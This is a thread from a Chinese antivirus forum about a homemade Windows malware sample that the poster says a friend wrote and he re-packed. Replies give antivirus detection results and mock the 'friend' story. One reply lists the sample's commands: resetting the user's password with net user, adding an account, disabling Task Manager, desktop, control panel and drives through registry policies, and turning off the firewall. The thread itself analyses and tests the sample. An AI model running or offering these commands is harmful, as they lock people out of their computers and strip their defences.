楼主: a7878330
收起左侧

[病毒样本] 我朋友做的病毒 我又改造了他這個病毒

[复制链接]
欧阳宣
头像被屏蔽
发表于 2019-3-29 04:30:43 | 显示全部楼层
提示: 该帖被管理员或版主屏蔽
杀软病综合医院
发表于 2019-3-29 08:40:29 | 显示全部楼层
测试环境:WIN7 SP1 64 虚拟机  原版未打补丁
测试产品:智量  360卫士12   火绒4.0  微点百慧
病毒库版本:发帖时最新版本
测试项目:扫描+双击
测试配置:扫描次序智量 360  火绒。然后剩余的双击,谁报了算谁的


测试时间2019年3月29日08:39:19


结果:
下载后
火绒报,360报
解压后智量报
微点未发现


双击
火绒立刻拦截
360等蓝屏界面出来一会了才开始清除,清除成功
微点未报


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
New_Start.
发表于 2019-3-29 08:52:49 | 显示全部楼层

意思是你自己写的,无中生有个友~
杀软小白鼠
发表于 2019-3-29 09:41:07 | 显示全部楼层
Panda Dome:


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
,就一个.
发表于 2019-3-29 14:10:56 | 显示全部楼层

这个是无中生友系列之第三季了吧?
学雷锋做人
头像被屏蔽
发表于 2019-3-29 14:26:25 | 显示全部楼层
好幼稚的窗口前置......,况且什么年代了,还用cmd.exe跑全套,就算修改系统开机密码、添加系统账户也有官方提供的API啊!

  1. cmd.exe /c net user %username% 5456D4FG564D56G5D64GH56D4JHFG56J4F56GfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffHJK5JH6J
  2. cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_dword /d 00000001 /f
  3. cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoChangeStartMenu /t REG_dword /d 00000001 /f
  4. cmd.exe /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewContextMenu /t REG_DWORD /d 1 /F
  5. cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /d 1 /t REG_DWORD /f
  6. cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSetTaskbar /d 1 /t REG_DWORD /f
  7. cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /d 1 /t REG_DWORD /f
  8. cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /d 1 /t REG_DWORD /f
  9. cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /d 1 /t REG_DWORD /f
  10. cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\MobilityCenter /v NoMobilityCenter /d 1 /t REG_DWORD /f
  11. cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /d 1 /t REG_DWORD /f
  12. cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_dword /d 1 /f
  13. cmd.exe /c netsh advfirewall set currentprofile state off
  14. net user test "
  15. net user test 5456D4FG564D56G5D64GH56D4JHFG56J4F56GfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffHJK5JH6J
  16. reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_dword /d 00000001 /f
  17. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoChangeStartMenu /t REG_dword /d 00000001 /f
  18. C:\Windows\system32\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewContextMenu /t REG_DWORD /d 1 /F
  19. C:\Windows\system32\net1 user test "
  20. reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /d 1 /t REG_DWORD /f
  21. C:\Windows\system32\net1 user test 5456D4FG564D56G5D64GH56D4JHFG56J4F56GfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffHJK5JH6J
  22. reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSetTaskbar /d 1 /t REG_DWORD /f
  23. reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /d 1 /t REG_DWORD /f
  24. reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /d 1 /t REG_DWORD /f
  25. reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /d 1 /t REG_DWORD /f
  26. reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\MobilityCenter /v NoMobilityCenter /d 1 /t REG_DWORD /f
  27. reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /d 1 /t REG_DWORD /f
  28. reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_dword /d 1 /f
  29. netsh advfirewall set currentprofile state off
复制代码

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
a7878330
 楼主| 发表于 2019-3-29 17:33:36 | 显示全部楼层
,就一个. 发表于 2019-3-29 14:10
这个是无中生友系列之第三季了吧?

別在嘴我了

我一直被你這樣

哭哭
a7878330
 楼主| 发表于 2019-3-29 17:34:38 | 显示全部楼层
菜鸟一个0 发表于 2019-3-29 08:52
意思是你自己写的,无中生有个友~

決不是我寫的  我只是改他外殼   但是主要是我朋友做的
a7878330
 楼主| 发表于 2019-3-29 17:37:00 | 显示全部楼层
本帖最后由 a7878330 于 2019-3-30 10:26 编辑

不關我们Taiwan事情
我只是一個小新手
不談政治 好嗎
a7878330
 楼主| 发表于 2019-3-29 17:37:51 | 显示全部楼层
RepublicCHINA 发表于 2019-3-28 23:51
网路用语,意思就是 你根本没这个朋友,其实是你自己做的怕别人抨击所以说是你朋友做的

不不不  真的是我朋友  但是我只是改他的病毒外殼
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-11-24 03:53 , Processed in 0.098210 second(s), 14 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表